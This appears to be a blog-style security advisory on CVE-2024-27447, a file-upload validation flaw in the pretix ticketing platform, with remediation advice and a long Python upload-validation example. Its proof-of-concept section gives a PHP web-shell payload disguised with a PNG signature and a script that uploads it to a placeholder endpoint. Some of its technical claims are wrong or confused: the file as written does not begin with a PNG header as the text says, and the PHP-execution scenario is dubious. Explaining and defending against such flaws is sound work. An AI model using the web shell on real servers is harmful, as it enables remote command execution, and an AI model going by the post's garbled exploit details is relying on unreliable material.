
Introduction

On February 27, 2024, a vulnerability in the popular event ticketing platform pretix was assigned the identifier CVE-2024-27447. The bug concerns how the system validates files before they are stored, allowing malicious files to slip through and potentially harm both users and servers. If you have used, developed, or managed a pretix instance older than version 2024.1.1, this post is for you.

Let's break down what CVE-2024-27447 is, why it matters, and how it can be abused—with some code snippets and links to help you understand its real impact.

What is pretix?

pretix is an open-source event ticketing tool. Organizations across the world depend on it for online ticket sales, badge management, and on-site check-ins.

File uploads are used for varied purposes—badge images, logos, attachments, etc. Unfortunately, this feature is where the trouble starts.

What Happens?

In versions before 2024.1.1 of pretix, the file validation system doesn't properly check files uploaded by users. More specifically, the server relies too much on extension-based checks (like .jpg or .png), and does not sufficiently verify the file content.

Example Exploit Scenario

Imagine a user is allowed to upload a PNG image for their badge. But the server *only* checks the filename’s extension. What if a user uploads picture.png, but the content is really a PHP script? If the upload is then placed into a web-accessible folder, and someone visits the file directly, the server might execute it.

PoC: How to Create a Malicious File

Below is a simple way to make a fake PNG file that’s actually PHP. (Don’t use this for bad ends—this is only to illustrate the issue.)

```php
<?php
// "sneaky.png" -- Looks like PNG header, then PHP
echo "\x89PNG\r\n\x1a\n";
echo "<?php system(\$_GET['cmd']); ?>";
?>
```

Save this as sneaky.png. It’s clearly not a PNG image, but it *will* have a PNG header. Many basic validation scripts, especially those checking only extensions, let this through.

Here’s how someone might upload this via a POST request:

```python
import requests

# Placeholder host and upload path; the real endpoint depends on the deployment.
files = {'file': ('sneaky.png', open('sneaky.png', 'rb'), 'image/png')}
response = requests.post('https://pretix.yoursite.example/control/event/upload', files=files)
print(response.status_code)
```

If the upload is accepted and accessible under /media/uploads/sneaky.png, you now have a potentially dangerous file on the server.

Why is This Bad?

- Remote Code Execution (RCE): On some misconfigured servers, uploading PHP files leads to full server compromise.
- Cross-site Scripting (XSS): Malicious HTML is rendered to other users if output isn’t filtered.
- Data Leaks: Attackers can trick users or admins into downloading files that run malware or steal data.

Official Patch

The pretix developers fixed this with release 2024.1.1 by:

- Location Isolation: storing uploads in non-executable locations, where appropriate

> They detail the fix and mitigation steps in their official security advisory.

If you run pretix before 2024.1.1

1. Update Now: Go to GitHub Releases and upgrade ASAP.

2. Harden Config: Ensure your server does not execute files from upload directories.

For Developers:
Always check *file content*, not just extensions. Use libraries like python-magic to verify MIME types.
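The content-level check recommended above, as an added example that is not pretix's own code: instead of python-magic (which needs libmagic) it uses a small standard-library magic-byte table plus a PNG chunk walk, so a file that only borrows the 8-byte PNG signature, a real image with data appended after IEND, or a JPEG renamed to .png is all rejected. The allowlist, MIME table, size limit and sample uploads are constructed for illustration.

```python
# Added example (not pretix's own code): content-aware validation of an image
# upload. The allowlist, MIME table and sample files below are constructed for
# illustration; a real deployment would also apply size limits and a virus scan.
import os
import struct
import zlib
from typing import Optional, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Leading bytes that identify each allowed type (magic numbers, not extensions).
MAGIC = {PNG_SIG: "png", b"\xff\xd8\xff": "jpeg", b"GIF87a": "gif", b"GIF89a": "gif"}
# Extension -> canonical type, and canonical type -> expected Content-Type.
ALLOWED_EXT = {"png": "png", "jpg": "jpeg", "jpeg": "jpeg", "gif": "gif"}
MIME_FOR = {"png": "image/png", "jpeg": "image/jpeg", "gif": "image/gif"}


def sniff_type(data: bytes) -> Optional[str]:
    """Identify the type from the file's first bytes; None if not recognised."""
    for sig, kind in MAGIC.items():
        if data.startswith(sig):
            return kind
    return None


def png_is_well_formed(data: bytes) -> bool:
    """Walk the PNG chunk list: IHDR first, every CRC valid, IEND last, no trailer.

    A file that merely starts with the 8-byte PNG signature (the "sneaky.png"
    trick) fails here, as does a real image with extra data appended after IEND.
    """
    if not data.startswith(PNG_SIG):
        return False
    pos, first = len(PNG_SIG), True
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_field = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_field) != 4:
            return False                      # truncated or bogus chunk length
        if first and ctype != b"IHDR":
            return False                      # PNG spec: IHDR must come first
        first = False
        expected_crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        if struct.unpack(">I", crc_field)[0] != expected_crc:
            return False                      # corrupted or hand-crafted chunk
        pos += 12 + length
        if ctype == b"IEND":
            return pos == len(data)           # nothing may follow IEND
    return False                              # ran out of data before IEND


def validate_upload(filename: str, declared_mime: str, data: bytes,
                    max_bytes: int = 5_000_000) -> Tuple[bool, str]:
    """Accept only if extension, declared type, magic bytes and structure agree."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    if len(data) > max_bytes:
        return False, "file too large"
    sniffed = sniff_type(data)
    if sniffed is None:
        return False, "content not a recognised image"
    if sniffed != ALLOWED_EXT[ext]:
        return False, f"extension says {ext} but content looks like {sniffed}"
    if declared_mime != MIME_FOR[sniffed]:
        return False, "declared Content-Type does not match content"
    if sniffed == "png" and not png_is_well_formed(data):
        return False, "PNG signature present but chunk structure invalid"
    return True, "ok"


def make_minimal_png() -> bytes:
    """Constructed sample: a valid 1x1 8-bit grayscale PNG built from scratch."""
    def chunk(ctype: bytes, body: bytes) -> bytes:
        crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, depth 8, grayscale
    idat = zlib.compress(b"\x00\x00")                      # filter byte + 1 pixel
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


# Constructed sample uploads: one genuine image and three look-alikes.
GOOD_PNG = make_minimal_png()
HEADER_ONLY_SPOOF = PNG_SIG + b"<html>not an image</html>"     # the sneaky.png trick
POLYGLOT_PNG = GOOD_PNG + b"<html>appended after IEND</html>"  # valid image + trailer
JPEG_BYTES = b"\xff\xd8\xff\xe0" + b"\x00" * 16                 # JPEG bytes, wrong name

if __name__ == "__main__":
    for name, mime, blob in [("badge.png", "image/png", GOOD_PNG),
                             ("sneaky.png", "image/png", HEADER_ONLY_SPOOF),
                             ("badge.png", "image/png", POLYGLOT_PNG),
                             ("photo.png", "image/png", JPEG_BYTES),
                             ("script.php", "image/png", GOOD_PNG)]:
        print(name, validate_upload(name, mime, blob))
```

The declared Content-Type is the least trustworthy input (the client sets it), so it is used only as a consistency check, never as the deciding factor; the magic bytes and the chunk walk are what actually decide. Storing accepted files under a random server-generated name in a directory the web server never executes from is still the other half of the fix.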

References

- pretix 2024.1.1 Changelog & Security Fix
- pretix Official Security Blog Post
- CVE-2024-27447 Entry
- python-magic Library

Conclusion

CVE-2024-27447 is a strong reminder that file uploads are more dangerous than they look. Always combine extension, MIME type, and—if possible—content inspection to keep your applications safe.

If you run pretix, upgrade now and review your security posture. Don’t let a simple image upload be the downfall of your event.

*Stay safe, audit your servers, and follow best practices!*

Timeline

Published on: 02/26/2024 16:28:00 UTC
Last modified on: 08/05/2024 16:35:07 UTC